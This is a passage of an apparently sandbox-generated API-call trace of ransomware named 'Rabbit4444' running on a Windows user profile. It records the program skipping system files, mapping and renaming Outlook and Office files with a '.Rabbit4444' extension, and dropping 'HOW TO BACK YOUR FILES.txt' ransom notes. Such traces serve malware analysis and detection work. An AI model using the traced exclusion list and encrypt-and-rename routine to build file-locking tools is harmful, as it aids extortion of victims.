dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="Rabbit4444.exe") returned -1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2=".") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="..") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="windows") returned -1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="bootmgr") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="pagefile.sys") returned -1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="boot") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="ids.txt") returned 1 [0052.749] lstrcmpiW (lpString1="Outlook.srs", lpString2="NTUSER.DAT") returned 1 [0052.749] lstrcpyW (in: lpString1=0x130eb9c, lpString2="Outlook.srs" | out: lpString1="Outlook.srs") returned="Outlook.srs" [0052.749] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs", dwFileAttributes=0x0) returned 1 [0052.750] lstrlenW (lpString="Outlook.srs") returned 11 [0052.750] lstrlenW (lpString="Rabbit4444") returned 10 [0052.750] lstrcmpiW (lpString1="utlook.srs", lpString2="Rabbit4444") returned 1 [0052.750] lstrlenW (lpString=".dll") returned 4 [0052.750] lstrcmpiW (lpString1=".srs", lpString2=".dll") returned 1 [0052.750] lstrlenW (lpString=".lnk") returned 4 [0052.750] lstrcmpiW (lpString1=".srs", lpString2=".lnk") returned 1 [0052.750] lstrlenW (lpString=".ini") returned 4 [0052.750] lstrcmpiW (lpString1=".srs", lpString2=".ini") returned 1 [0052.750] lstrlenW (lpString=".sys") returned 4 [0052.750] lstrcmpiW (lpString1=".srs", lpString2=".sys") returned -1 [0052.750] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.750] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.750] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14406114462) returned 1 [0052.750] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2560) returned 1 [0052.751] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.751] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0052.751] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd00, lpName=0x0) returned 0x298 [0052.752] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd00) returned 0x70000 [0052.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0052.756] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0052.756] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0052.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0052.757] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14406743856) returned 1 [0052.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.757] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0052.757] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.757] CloseHandle (hObject=0x298) returned 1 [0052.757] CloseHandle (hObject=0x278) returned 1 [0052.757] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Rabbit4444") returned 72 [0052.757] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.rabbit4444"), dwFlags=0x1) returned 1 [0052.758] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd629eb7, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd650107, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x916, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="Rabbit4444.exe") returned -1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2=".") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="..") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="windows") returned -1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="bootmgr") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="pagefile.sys") returned -1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="boot") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="ids.txt") returned 1 [0052.758] lstrcmpiW (lpString1="Outlook.xml", lpString2="NTUSER.DAT") returned 1 [0052.758] lstrcpyW (in: lpString1=0x130eb9c, lpString2="Outlook.xml" | out: lpString1="Outlook.xml") returned="Outlook.xml" [0052.758] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", dwFileAttributes=0x0) returned 1 [0052.758] lstrlenW (lpString="Outlook.xml") returned 11 [0052.758] lstrlenW (lpString="Rabbit4444") returned 10 [0052.758] lstrcmpiW (lpString1="utlook.xml", lpString2="Rabbit4444") returned 1 [0052.758] lstrlenW (lpString=".dll") returned 4 [0052.758] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0052.758] lstrlenW (lpString=".lnk") returned 4 [0052.758] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0052.758] lstrlenW (lpString=".ini") returned 4 [0052.759] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0052.759] lstrlenW (lpString=".sys") returned 4 [0052.759] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0052.759] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.759] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.759] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14406955291) returned 1 [0052.759] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2326) returned 1 [0052.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0052.759] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc20, lpName=0x0) returned 0x298 [0052.760] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc20) returned 0x70000 [0052.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0052.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0052.763] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0052.763] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0052.764] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14407429766) returned 1 [0052.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.764] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0052.764] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.764] CloseHandle (hObject=0x298) returned 1 [0052.764] CloseHandle (hObject=0x278) returned 1 [0052.764] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.Rabbit4444") returned 72 [0052.764] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.rabbit4444"), dwFlags=0x1) returned 1 [0052.815] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd629eb7, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xdd629eb7, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd650107, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x916, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 0 [0052.815] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0052.815] lstrcpyW (in: lpString1=0x130eb9c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\outlook\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.816] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.816] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.816] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.816] CloseHandle (hObject=0x278) returned 1 [0052.816] CloseHandle (hObject=0x27c) returned 1 [0052.816] GetCurrentThreadId () returned 0xd98 [0052.816] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6930 [0052.816] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" [0052.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11e8 | out: hHeap=0xe0000) returned 1 [0052.816] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6928 | out: hHeap=0xe0000) returned 1 [0052.816] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office" [0052.817] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\" [0052.817] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3" [0052.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.818] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.821] FlushFileBuffers (hFile=0x27c) returned 1 [0052.822] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.822] CloseHandle (hObject=0x27c) returned 1 [0052.822] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office") returned 48 [0052.822] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.822] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8ce5d78, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0052.822] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.822] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.822] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.822] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.823] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8ce5d78, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.823] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.823] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.823] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.823] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.823] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.823] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8ce5d78, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8ce5d78, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8ce5d78, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.823] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.823] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.823] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2f2525a, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2f2525a, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Rabbit4444.exe") returned -1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2=".") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="..") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="windows") returned -1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="bootmgr") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="pagefile.sys") returned -1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="boot") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ids.txt") returned 1 [0052.823] lstrcmpiW (lpString1="MSO1033.acl", lpString2="NTUSER.DAT") returned -1 [0052.823] lstrcpyW (in: lpString1=0x130eb9a, lpString2="MSO1033.acl" | out: lpString1="MSO1033.acl") returned="MSO1033.acl" [0052.823] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl", dwFileAttributes=0x0) returned 1 [0052.823] lstrlenW (lpString="MSO1033.acl") returned 11 [0052.823] lstrlenW (lpString="Rabbit4444") returned 10 [0052.824] lstrcmpiW (lpString1="SO1033.acl", lpString2="Rabbit4444") returned 1 [0052.824] lstrlenW (lpString=".dll") returned 4 [0052.824] lstrcmpiW (lpString1=".acl", lpString2=".dll") returned -1 [0052.824] lstrlenW (lpString=".lnk") returned 4 [0052.824] lstrcmpiW (lpString1=".acl", lpString2=".lnk") returned -1 [0052.824] lstrlenW (lpString=".ini") returned 4 [0052.824] lstrcmpiW (lpString1=".acl", lpString2=".ini") returned -1 [0052.824] lstrlenW (lpString=".sys") returned 4 [0052.824] lstrcmpiW (lpString1=".acl", lpString2=".sys") returned -1 [0052.824] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.824] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.824] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14413470306) returned 1 [0052.824] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=37730) returned 1 [0052.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0052.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1017c0 [0052.824] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9670, lpName=0x0) returned 0x298 [0052.825] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9670) returned 0x70000 [0052.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.831] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.831] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14414205053) returned 1 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0052.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1017c0 | out: hHeap=0xe0000) returned 1 [0052.831] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.832] CloseHandle (hObject=0x298) returned 1 [0052.832] CloseHandle (hObject=0x278) returned 1 [0052.832] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.Rabbit4444") returned 71 [0052.832] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\mso1033.acl.rabbit4444"), dwFlags=0x1) returned 1 [0052.833] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee8b468d, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="Rabbit4444.exe") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="bootmgr") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="pagefile.sys") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="boot") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="ids.txt") returned 1 [0052.833] lstrcmpiW (lpString1="Recent", lpString2="NTUSER.DAT") returned 1 [0052.833] lstrcpyW (in: lpString1=0x130eb9a, lpString2="Recent" | out: lpString1="Recent") returned="Recent" [0052.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x70) returned 0x117608 [0052.833] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf64b0 [0052.833] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee8b468d, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0052.833] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0052.833] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.833] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 